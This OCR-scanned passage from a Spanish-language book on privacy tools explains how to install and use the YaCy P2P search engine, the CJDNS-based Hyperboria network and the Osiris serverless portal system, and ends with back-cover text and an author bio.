Se trata de un potente buscador web que utiliza un modelo descentralizado basado en conexiones P2P 
para buscar e indexar contenidos en Internet. Su funcionamiento es distinto al de otros buscadores 
convencionales y se basa en el principio de que el motor de busqueda no se encuentra operado por 
un unico proveedor, sino que se encuentra distribuido en multiples puntos en Internet. Actualmente 
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existen cerca de 1.5 millones de contenidos indexados con mas de 600 contribuidores y en la medida 
en la que los usuarios realizan busquedas utilizando YaCy, el numero de contenidos indexados va 
creciendo. Otras caracteristicas interesantes de YaCy son que el motor de busqueda se ejecuta en 
el ordenador del usuario, los criterios de busqueda son codificados antes de ser enviados a otros 
contribuidores de YaCy y es un buscador que se enfoca en la privacidad de los usuarios que lo 
utilizan. Para instalar YaCy, solamente hace falta descargar la ultima version disponible en http:// 
www.yacy.net/ y ejecutar el script de inicio. En el caso de sistemas basados en Linux, ademas es 
necesario tener instalado el OpenJDK7. Posteriormente, basta con ejecutar el script, el cual recibe 
el nombre de “startYACT\ 


>./startYACY.sh 

****************** YaCy Web Crawler/Indexer & Search Engine 
**** (c) by Michael Peter Christen, usage granted under the GPL Version 2 
**** USE AT YOUR OWN RISK! Project home and releases: http://yacy.net/ 

** LOG of YaCy: DATA/LOG/yacyOO.log (and yacy<xx>.log) 

** STOP YaCy: execute stopYACY.sh and wait some seconds 

** GET HELP for YaCy: see http://wiki.yacy.net and http://forum.yacy.de 
********************************************************************* 

» YaCy started as daemon process. Administration at http://localhost:8090 « 


******************* 
**** 
* * ** 
* * 
* * 
* * 

******* 


Con el comando anterior, automaticamente se iniciara un servidor web en el puerto “8090” en la 
maquina local y desde alii, se pueden realizar busquedas en Internet utilizando YaCy. 

Existen muchas funcionalidades que son interesantes en YaCy y que pueden ser integradas facilmente 
en una aplicacion existente, algunas de ellas se encuentran incluidas en la interfaz de administracion 
de la instancia y muy bien explicadas en la documentation oficial del proyecto: http://www.yacy. 
net/es/T utoriales .htm 1. 



Imogen 05.05: Interfaz de administracion de YaCy. 
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En el panel ubicado a la izquierda de la consola de administration, es posible acceder a todas las 
opciones de configuracion que se encuentran disponibles en YaCy. En la seccion “First Steps ”, se 
pueden establecer opciones basicas de configuracion de la instancia, como por ejemplo el idioma, 
nombre del peer, puerto, etcetera. Ademas, tambien se puede crear un proceso de crawling sobre un 
dominio concreto, soportando protocolos tales como HTTP/HTTPS, FTP o SMB. 

En la seccion de Monitoring ” es posible verificar el estado de la instancia y los procesos de crawling 
que se encuentran en ejecucion. 

En la seccion de " Production ” es posible establecer opciones avanzadas para el proceso de crawling 
de dominios y diferentes opciones para el proceso de indexation de contenidos. 

En la seccion de “ Administration ” es posible gestionar los contenidos que han sido indexados en 
la instancia, establecer atributos para el analisis de contenidos, cambiar valores de configuracion 
relacionados con los procesos en ejecucion y listas negras de URLs que seran filtradas y cuyos 
contenidos no seran cargados. 

Finalmente, en la seccion de “ Search Portal Integration ”, se encuentran los detalles de configuracion 
para integrar el motor de busqueda en un portal web. Dichas opciones incluyen, entre otras cosas, la 
posibilidad de ajustar la apariencia de la interfaz del buscador y establecer parametros globales para 
los filtros y las estadisticas que pueden generarse en el motor de busquedas integrado. 



Imogen 05.06: Definicion de procesos de crawling basicos en YaCy. 

Las busquedas con YaCy son rapidas, fiables y privadas y al no existir un proveedor centralizado, 
como es el caso de la mayoria de los motores mas populares, la censura de los contenidos o la 
evaluation y seguimiento de usuarios es practicamente imposible. Se trata de una solution altamente 
recomendada a la hora de realizar busquedas por internet de forma privada. 
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5.5 Hyperboria 

Se trata de una red con enfoque a la privacidad de las comunicaciones entre los participantes, la cual 
se basa en el protocolo de enrutamiento definido en el proyecto CJDNS. cuyas caracteristicas le 
permiten tener disponible una red P2P basada en IPv6 con cifrado punto a punto de forma automatica, 
con asignacion de direcciones IP de forma distribuida y enrutamiento basado en una tabla hash 
distribuida (DHT). CJDNS asigna las direcciones IPv6 en la red utilizando los primeros 16 bytes 
de la clave publica en formato SHA-512 y el enrutamiento de los paquetes se basa en una version 
modificada del algoritmo Kademlia para implementar una DHT disenada de tal manera que cada 
nodo responded a las consultas de busqueda (“search queries ”) que piden otros nodos cercanos a el. 
Esto permite que el nodo pueda determinar y anadir rutas a su propia tabla de enrutamiento. 

Una vez que el nodo emisor ha conseguido una ruta, envia su paquete al primer nodo en dicha ruta 
y posteriormente para cada salto, el nodo receptor lee el encabezado del paquete para determinar 
a que nodo debe dirigirse. Antes de que el paquete sea reenviado al siguiente salto, el nodo crea 
una etiqueta en las cabeceras del paquete para que se encuentre preparado para ser utilizando en el 
siguiente nodo. 


5.5.1 Instalacion de CJDNS 

Dado que Hyperboria se basa en CJDNS, en primer lugar es necesario instalar y configurar dicho 
proyecto. Para ello, se debe proceder a descargar CJDNS desde el repositorio Github oficial. 

>git clone https://github.com/cjdelisle/cjdns.git cjdns 
>cd cjdns 
>. /do 

Test 374ms 
Pack 1ms 
Get mtimes 8ms 
Save State 11ms 

Build completed successfully, type ./cjdroute to begin setup. 

Total build time: 15052ms. 

Y posteriormente, se debe ejecutar el script “do” el cual se encarga de compilar e instalar el proyecto 
en el sistema. 

A continuation, se debe generar un fichero de configuration ejecutando la utilidad “ cjdroute ” 

>./cjdroute —genconf » cjdroute.conf 

El comando anterior generara el fichero de configuracion “cjdroute. conf el cual contiene detalles 
tan importantes como la contrasena del nodo, conexiones a otros peers, entre otras cosas. 

Antes de continuar, es necesario establecer una conexion a un peer en la red y para ello, es necesario 
contactar con algun administrador de uno de los nodos que permita la conexion, el cual verificara que 
las intenciones del usuario son legitimas. Los medios para encontrar un nodo amigo se encuentran 
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1451243915 DEBUG Configurator.c: 564 Security_setupComplete () 

1451243915 DEBUG Configurator. c: 648 Cjdns started in the background 

A partir de este punto y con uno o varios peers en Hyperboria, es posible comenzar a navegar por 
los diferentes tipos de servicios que se encuentran disponibles en la red por medio de la interfaz que 
ha generado CJDNS. 

>if config 

tunO Link encap:UNSPEC direccionHW 00-00—00-00-00-00-00-00-00-00—00-00—00— 

00 - 00-00 

Direccion inet6: fcba:b280:fel8:daa2:729e:c775:523d:5576/8 
Alcance:Global 

ACTIVO PUNTO A PUNTO FUNCIONANDO NOARP MULTICAST MTU:1304 Metrica:l 
Paquetes RX:0 errores:0 perdidos:0 overruns:0 frame:0 
Paquetes TX:0 errores:0 perdidos:0 overruns:0 carrier:0 
colisiones:0 long.colaTX:500 
Bytes RX:0 (0.0 B) TX bytes:0 (0.0 B) 

Finalmente, para detener CJDNS, se debe ejecutar el siguiente comando: 

>sudo killall cjdroute 


5.6 Osiris SPS 

Osiris Serverless Portal System, es un sistema de creacion de contenidos libre y abierto que esta 
pensado para no depender de un servidor centralizado. Los contenidos de dichos portales son 
distribuidos en cada uno de los ordenadores que hacen parte de la red, de un modo muy similar a 
otras soluciones enfocadas en la distribution de contenidos. Por otro lado, se trata de un sistema 
enfocado a la privacidad y el anonimato, aunque en este ultimo punto depende de la cantidad de 
usuarios que participan en la red y contribuyen a un portal concreto. 

En este sentido, el sistema le permite a un usuario crear una o varias identidades virtuales, las 
cuales pueden ser utiles para distribuir o publicar contenidos de un portal y dado que en Osiris no 
existe diferencia entre distribuidor o redactor de contenidos no se puede atribuir la creacion de un 
contenido dado a una identidad virtual. Por otro lado, no existe una administration centralizada, y 
dependiendo de la tipologia del portal, cualquiera puede leer y editar contenidos, todos los usuarios 
tienen los mismos privilegios y un contenido solamente puede ser censurado si la comunidad esta de 
acuerdo y ademas, para evitar spammers existe un sistema de reputation. 

Para poder utilizar Osiris, se debe instalar el cliente que se encuentra disponible en el sitio web 
oficial: http://www.osiris-sps.org/download/. Es posible instalar el programa directamente en el 
sistema o utilizar la version portable, la cual tiene la ventaja de que puede ser utilizada en otros 
ordenadores. En cualquier caso, el procedimiento de instalacion consiste en un asistente muy simple 
en el que se deben seleccionar algunas opciones de configuration general tales como el idioma, 
puertos habilitados para el funcionamiento de Osiris, etcetera. 
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Wizard of the first start of Osiris 


Q Network 

Here you can specify the network options. 

TCP ports- 

WEB port; 


47531 


□ Enable UPNP Port test 


P2P port; 144359 El Enable UPNP Port test 
UPnP Service Status: Available sL 


Connection limits 


Max incoming connections: |5 



Max outcoming connections: [5 



<Back 

Next> 

Cancelar | 


Imogen 05.07: Opciones de configuracion de la red en Osiris. 


Una vez completado el proceso de instalacion, se podra apreciar una interfaz de administracion 
en el navegador web por defecto del usuario, en la cual sera posible gestionar los portales a los 
que se encuentra inscrito el usuario. Desde dicha interfaz tambien es posible configurar diversos 
detalles relacionados con la privacidad, configuracion del uso de la red, entre otras opciones. Por 
otro lado, tambien cuenta con un sistema de complementos que le permiten al usuario extender las 
funcionalidades de los portales que administra. 

Evidentemente la principal funcionalidad que se encuentra incluida en la interfaz de administracion 
es la de crear y suscribirse a portales existentes en Osiris. En el primer caso, para crear un portal es 
necesario definir que se trata de un portal “ monarquico ” o “ anarquico ”, si el portal es “ monarquico ”, 
el creador tiene todos los privilegios sobre el portal y puede decidir que se debe hacer con los 
contenidos publicados y si el portal es “anarquico", todos los usuarios tienen los mismos privilegios 
sobre el portal. Independiente del modelo seleccionado, no se puede cambiar el sistema una vez se 
ha creado el portal. Por otro lado, Osiris cuenta con un sistema en el que se pueden consul tar algunos 
de los portales que se encuentran disponibles en la red y a los que un usuario se puede suscribir de 
forma directa, dicho sistema se llama “Isis” y se encuentra disponible en la siguiente ruta: http;// 
www.osiris-sps.org/isis/home.php 



Imogen 05.08: Gestion de portales en Osiris. 
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Si bien es un proyecto muy interesante, a la fecha de redactar este documento se encuentra 
practicamente abandonado, ya que cuenta con pocos usuarios y portales activos, no obstante sigue 
siendo una herramienta perfectamente valida a la hora de crear contenidos que se distribuyen sobre 
la red de usuarios de Osiris. 
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La privacidad es un derecho fundamental que se encuentra recogido en la declaracion 
universal de derechos humanos, sin embargo es uno de los mas vulnerados por gobiernos 
y entidades con altos niveles de autoritarismo y fuertes medidas de represion. La libertad 
de expresion en los tiempos que corren es considerada por muchas entidades como una 
seria amenaza para el orden publico y debido a esto, ultimamente se comienza a apreciar 
un aumento de leyes y regulaciones cuyo principal objetivo es ei de controlar que se puede 
y que no se puede hacer o decir en medios como Internet. Esta situacion ha dado lugar a 
grandes controversias y criticas sobre dichas regulaciones y debido a esto, desde hace 
algunos anos se han ido creando y consolidando varios grupos de personas que se dedican 
a crear herramientas cuya finalidad es la de proteger la privacidad de sus usuarios por 
medio de mecanismos de anonimato fuertes. 


Se trata de herramientas con una finalidad bastante y con un nivel tecnologico alto, lo que 
ha permitido al surgimiento de las "darknets" en las que es posible encontrar personas que 
comparten informacion libremente sin ningun tipo de censura, no obstante, como ocurre 
con cualquier herramienta, pueden ser usadas de forma legftima para ayudar a personas 
que sufren abusos en zonas conflictivas o por ciberdelincuentes que se dedican a realizar 
actividades ilegales valiendose de los fuertes niveles de anonimato que aportan estas 
soluciones. En el presente documento encontraras el funcionamiento de las principales 
herramientas para proteger tu privacidad y consolidar tu anonimato en entornos como 
Internet. 

Daniel Echeverri Montoya, apasionado de la seguridad informatica y el hacking, autor del 
blog thehackerway.com, autor de los libros de "Python para Pentesters" y "Hacking con 
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en el desarrollo de algunas herramientas y iibrerias enfocadas a la seguridad informatica 
tales como Denrit, W3AFRemote, pynessus-rest y Tortazo. En su trayectoria profesional ha 
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